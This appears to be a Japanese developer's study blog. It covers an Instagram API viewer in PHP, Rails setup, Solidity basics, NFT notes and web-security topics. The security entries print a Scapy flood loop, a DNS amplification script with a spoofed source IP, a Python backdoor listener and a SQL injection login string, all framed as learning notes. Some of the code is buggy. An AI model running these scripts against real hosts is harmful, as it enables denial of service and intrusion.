[InstagramAPI] 投稿を取得してHTMLで表示

1. facebookとinstagramのアカウントを開設(すでにある場合はスキップ)
2. instagramをビジネスアカウントへ変更
3. Facebookページの作成
4. FacebookページとInstagramビジネスアカウントの紐づけ
5. Facebookアプリ作成
6. アクセストークンを取得する ()
– InstagramグラフAPIエクスプローラーで、アクセストークンを取得
instagram_basic
instagram_manage_comments
instagram_manage_insights
instagram_manage_messages
instagram_content_publish
business_management
– 上記で取得した「アクセストークン」と、Facebookアプリの「アプリID」と「app secret」からアクセストークンを取得
https://graph.facebook.com/v4.0/oauth/access_token?grant_type=fb_exchange_token&client_id=[★アプリID]&client_secret=[★app secret]&fb_exchange_token=[★1番目のトークン]

– https://graph.facebook.com/v4.0/me?access_token=[★2番目のトークン] でIDを取得
– https://graph.facebook.com/v4.0/[★ここにIDを入力]/accounts?access_token=[★2番目のトークン]
– InstagramビジネスアカウントIDを取得

### htmlで表示
conf.php

<?php

return [
    'business_id' => '${business_id}',
    'access_token' => '${access_token}',
];
?>

index.php

<?php

$config = include(__DIR__ . '/conf.php');

$business_id = $config['business_id'];
$access_token = $config['access_token'];

if(isset($_GET['username']) && $_GET['username'] != ""){
	$username = htmlspecialchars($_GET['username']);
} else {
	$username = "miyagawadai";
}

$url = "https://graph.facebook.com/v4.0/" . $business_id ."?fields=business_discovery.username(" . $username . "){media{timestamp,media_url,like_count,comments_count,caption}}&access_token=" . $access_token;

try {
	$json = json_decode(file_get_contents($url), true);
	$results = $json['business_discovery']['media']['data'];
} catch (Exception $ex){
	$results = "";
}

?>

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Get Instagram Likes!</title>
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.3/css/bulma.min.css">
	<style>
		body {
			margin: 50px 200px 50px;
		}
		.card {
			width: 100%;
		} 
		.card-content{
			height: 120px;
		}
	</style>
</head>
<body>
	<h1 class="title">Get Instagram Likes!</h1>
	<form action="">
		<div class="field">
		  <label class="label">User Name</label>
		  <div class="control">
		    <input class="input" type="text" name="username" placeholder="Instagram username">
		  </div>
		</div>
		<div class="control">
		    <button type="submit" class="button is-link is-light">Show</button>
		 </div>
	</form>
	<hr>
	<?php
		echo "result: " .$username."<br><br><br>";
		echo "<div class='columns'>";
		$i = 1;
		foreach($results as $result){
			echo "<div class='card column'><div class='card-image'><figure class='image is-4by3'><img src=" . $result['media_url'] ."></figure></div><div class='card-content'><div class='content'>" .number_format($result['like_count'])." Like!<br>".mb_substr($result['caption'], 0, 30)."...</div></div></div>" ;
			if($i % 3 == 0) {
				echo "</div><div class='columns'>";
			}
			$i++;
		}
		echo "</div>";
	?>
</body>
</html>

defaultで”miyagawadai”さんのinstaを表示する様にしています。

ほう、
twitterよりも規約が厳しい模様
やってる人もそんなに多くないか…

ubuntu20.04でRailsを触りたい

### 環境構築
$ ruby -v
$ rbenv install –list
$ rbenv install 2.7.2

$ sudo apt install sqlite3
$ sqlite3 –version
3.31.1 2020-01-27 19:55:54 3bfa9cc97da10598521b342961df8f5f68c7388fa117345eeb516eaa837balt1

$ gem install rails -v 5.1.3 –no-document
$ sudo apt install ruby-railties
$ rails -v
Rails 5.1.3

### railsアプリ
$ rails new myapp
$ rails server -b 192.168.33.10 -d
=> Booting Puma
=> Rails 5.1.7 application starting in development
=> Run `rails server -h` for more startup options

サーバーのdown
$ cat tmp/pids/server.pid
24555
$ kill -9 24555

ログ
$ tail log/development.log

### scaffold
$ rails g scaffold Memo title:string body:text
$ rails db:migrate

http://192.168.33.10:3000/memos

$ ps aux | grep puma
$ kill -9 24777

app, config, dbなどを主に使用する

### model作成
単数系になる
$ rails g model Post title:string body:text
$ rails db:migrate

### データ挿入
$ rails c

$ p = Post.new(title:’title1′, body:’body1′)
$ p.save

$ Post.create(title:’title2′, body:’body2′)

$ Post.all
$ quit

[Ethereum] Solidityの基礎構文 その2

### contractでの宣言

pragma solidity ^0.4.19;

contract ZombieFactory {

    uint dnaDigits = 16;
}

uintは符号なし256ビットinteger(正のみ)、uint8、uint16、 uint32などもある

### 構造体

contract ZombieFactory {

    uint dnaDigits = 16;
    uint dnaModulus = 10 ** dnaDigits;
    
    struct Zombie {
        string name;
        uint dna;
    }

}

### 配列
solidityには固定長配列と可変長配列がある

uint[2] fixedArray;

string[5] stringArray;

uint[] dynamicArray;
```
publicな配列にすれば、他のコントラクトもこの配列を読める
```
contract ZombieFactory {

    uint dnaDigits = 16;
    uint dnaModulus = 10 ** dnaDigits;

    struct Zombie {
        string name;
        uint dna;
    }
    Zonbie[] public zombies;

}

### 関数

function eatHumburgers(string _name, uint _amount) {
	
}

eatHamburgers("vitalink", 100)

実例

    function createZombie(string _name, uint _dna){

    }

### 新しい構造体

Person satoshi = Person(20, "Satoshi");
people.push(satoshi)

people.push(Person(15, "akemi"));

関数の中に書く

    function createZombie(string _name, uint _dna) {
        // ここから始めるのだ
        zombies.push(Zombie(_name, _dna));
    }

### Private/Public
publicの関数は誰でもコントラクトの関数を呼び出して実行できる
以下の様に書くと、contract内の他の関数からのみ読み出せる

uint[] numbers;

function _addToArray(uint _number) private {
	numbers.push(_number);
}

privateの関数はアンダーバー(_)で始めるのが通例

    function _createZombie(string _name, uint _dna) private {
        zombies.push(Zombie(_name, _dna));
    }

### 関数の戻り値

string greeting = "what's up dog";

function sayHello() public returns (string) {
	return greeting;
}

関数で変更するにはviewを使う

function sayHello() public view returns (string) {
	return greeting;
}

テスト

    function _generateRandomDna(string _str) private view returns(uint){
        
    }

### Keccak256
ランダムな256ビットの16進数

    function _generateRandomDna(string _str) private view returns (uint) {
        uint rand = uint(keccak256(_str));
        return rand % dnaModulus;
    }

### 統合

    function createRandomZombie(string _name) public {
        uint randDna = _generateRandomDna(_name);
        _createZombie(_name, randDna);
    }

### event
ブロックチェーンで何かが生じた時にフロントエンドに伝えることができる
何かあったときにアクションを実行する

event IntegersAdded(uint x, uint y, uint result);

function add(uint _x, uint _y) public {
	uint result = _x + _y;
	IntegersAdded(_x, _y, result);
	return result;
}

js側

YourContract.IntegersAdded(function(error, result) {
  // 結果について何らかの処理をする
})

テスト

    event NewZombie(uint zombieId, string name, uint dna);

    function _createZombie(string _name, uint _dna) private {
        uint id = zombies.push(Zombie(_name, _dna)) - 1;
        NewZombie(id, _name, _dna);
    }

### フロントエンド

var abi = ""
var ZombieFactoryContract = web3.eth.contract(abi)
var ZombieFactory = ZombieFactoryContract.at(contractAddress)

#("ourButton").click(function(e) {
	var name = $("#nameInput").val()
	ZombieFactory.createRandomZombie(name)
})

var event = ZombieFactory.NewZombie(function(error, result){
	if(error) return
	generateZombie(result.zombieId, result.name, result.dna)
})

function generateZombie(id, name, dna){
	let dnaStr = String(dna)

	while(dnaStr.length < 16)
		dnaStr = "0" + dnaStr

	let zombieDetails = {
		headChoice: dnaStr.substring(0, 2) % 7 + 1,
	    eyeChoice: dnaStr.substring(2, 4) % 11 + 1,
	    shirtChoice: dnaStr.substring(4, 6) % 6 + 1,
	    skinColorChoice: parseInt(dnaStr.substring(6, 8) / 100 * 360),
	    eyeColorChoice: parseInt(dnaStr.substring(8, 10) / 100 * 360),
	    clothesColorChoice: parseInt(dnaStr.substring(10, 12) / 100 * 360),
	    zombieName: name,
	    zombieDescription: "A Level 1 CryptoZombie",
	}

	return zombieDetails
}

なるほど、ゾンビとかふざけ気味だが、中々のものだな

[NFT] mintとは

NFTにおけるMintとはスマートコントラクトを使ってNFTを新たに作成発行すること
NFTマーケットプレイスにアップロードし、オンチェーンになっていることをmintと言う
OpenSeaではMintが使われている

### Matic
Polygonはイーサリアムにおけるセカンドレイヤソリューションの一つ
イーサリアムのスケーラビリティ問題を解決するために作られたプロジェクト
MaticからPolygonにリブランディングされた
高速、低コスト
イーサリアムからは独立したコンセンサスアルゴリズム
zkrollup
様々なDappsやDeFiがPolygonに参入

### NFTにできるコンテンツ
芸術作品、デジタルアート、音楽、土地、ゲーム、映画・アニメ、ライブチケット、ゲームのアイテム

なるほど、モダンな開発では、Polygonベースで作っていくのね

[Security] DoS攻撃

自分の契約しているvpsに自分でパケットを送る

$ pip3 install scapy

from scapy.all import*

source_IP = "*.*.*.*"
target_IP = "*.*.*.*"
source_port = "80"
i = 1

while True:
   IP1 = IP(source_IP = source_IP, destination = target_IP)
   TCP1 = TCP(srcport = source_port, dstport = 80)
   pkt = IP1/TCP1
   send(pkt, inter = .001)

   print("paket sent ", i)
   i = i + 1

$ python3 main.py
raise AttributeError(fname)
AttributeError: source_IP

うまくいかんな

違う方法

from scapy.all import *

target = "*.*.*.*"
dns1 = "*.*.*.*"

udp = UDP(dport=53)
dns = DNS(rd=1, qdcount=1, qd=DNSQR(qname="www.google.com", qtype=255))

i = 1

while True:
   ip = IP(src=target, dst=dns1)
   request = (ip/udp/dns)
   send(request)

   print("udp sent ", i)
   i = i + 1

なるほど、while文でパケットを送り続けるのか
ネットワーク周りの知識がかなり必要だな

[Security] ステルスコマンディング

リクエストに不正な命令文を隠しこむことで、WebブラウザからWebアプリケーションに予想外の動作を引き起こす攻撃

a) OSコマンドインジェクション
b) sqlインジェクション
以下のパスワードを入力することでWHERE句全体が常に真(TRUE)となり、正規のパスワードが何であってもログインが成功する

' OR '1'='1

XPATHインジェクション、ディレクトリ検索条件に干渉するLDAPインジェクションなどがある

[Security] バックドアとデバックオプション

システムの裏口のようなもので、認証や正規の手順を踏まずにある機能を直接利用したりするための機能
開発中のバグ修正などを行う
バックドア、デバックオプションを削除せずに運用が開始される場合がある

### サンプル1
http://www.example.co.jp/bank.cgi/?debug=off

http://www.example.co.jp/bank.cgi/?debug=on&from=9876-5432&to=1234-5678&amount=1000000

デバックオフで制御を解除して実行できてしまう
「Gazer」では、コード内の文字列を変化、マーカーをランダム化させ、証拠と思わしきファイルを消去するなど痕跡が残らない巧妙な設計がなされている
アクセスしただけでダウンロードが始まる

### Pythonによるバックドア例
1. バックドアアクセス用のサーバ作成
socket, subprocessを使用する
socketでは、TCPまたはUDPソケットを作成するために使用できる関数も呼び出される
socket.socket関数でソケットw作成する
socket.AF_INET: IPv4指定
socket_STREAM: TCP指定

import socket
def connection():
    global s
    s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('0.0.0.0', 4445))
    s.listen(1)
    print("waiting...")
def accept_connections():
    global target
    target, ip_list= s.accept()
    print("connection received from: " + str(ip_list[0]))
def commands():
    while True:
        command= input('command> ')
        bit_encoded_command= str.encode(command)
        if command== 'exit':
            target.send(bit_encoded_command)
            receive= target.recv(1024)
            receive_decoded= bytes.decode(receive, "utf-8")
            print(receive_decoded)
            break
connection()
accept_connections()
commands()

[Security] アプリケーションバッファオーバー

システムが予め確保しているうバッファ領域よりも大きなサイズを送りつけることで、バッファ領域を溢れさせ、バッファ領域外のコードを任意のコードで上書きしてしまう攻撃

例えば、入力フォームで数千文字の数字を入力して送信ボタンを押すと、送り込まれた大量のデータがバッファ領域を超え、バッファ領域外が上書きされてしまうことがある。
各入力フォームの最大長を設定することで防ぐことができる

char *
gets(char *buf)
{
  int c;
  char *s;
  for (s = buf; (c = getchar()) != '\n'; )
    if (c == EOF)
        if (s == buf){
            return (NULL);
        } else
            break;
    else
        *s++ = c;
  *s = '\0';
  return (buf);
}

入力したデータを全て受け取ると、オブジェクトの値が変わることがある

DoS攻撃は、サーバ負荷を増やすための攻撃
なるほど、バリデーションが如何に大事か理解できました

[Security] 強制ブラウズ

強制ブラウズ とは、アドレスバーからURLを直接入力して、非公開のブラウzを強制的に表示させてしまう攻撃

http://www.example.co.jp/some/path/filename.html

この場合、URLを推測してアクセスしてくる場合がある

### コメント
コードのコメントの意味を読み取って、攻撃する場合がある

### 検出方法
– 検索エンジンによる検索
– nikto
– OWASP DirBuster
– ZAP
– wfuzz

OWASP DirBusterの例
ターゲットURLとディレクトリリストを入力すると、見つかったディレクトリ等が表示されれて、ファイルを表示することもできる
ワードプレスのようなOSSの場合はディレクトリ構成が既に判明しているため、攻撃を受けやすい

攻撃方法を専門で研究している人もいるのか…
怖いね

[Security] hiddenフィールドの不正操作

ショッピングサイトにおいて商品の価格をHiddenフィールドに埋め込む

<input type="hidden" name="price" value="40">

このvalueが書き換えられると、より安い値段で決済されてしまうので、商品情報のDB側を値を参照して決済処理しないとsecureにならない

もしくは、hiddenの値が書き換えられてないかチェックする仕組みをcontroller側で実装する

amazonの商品ページのソースコードを見ましたが、priceはinputフィールドに記載がなさそうですね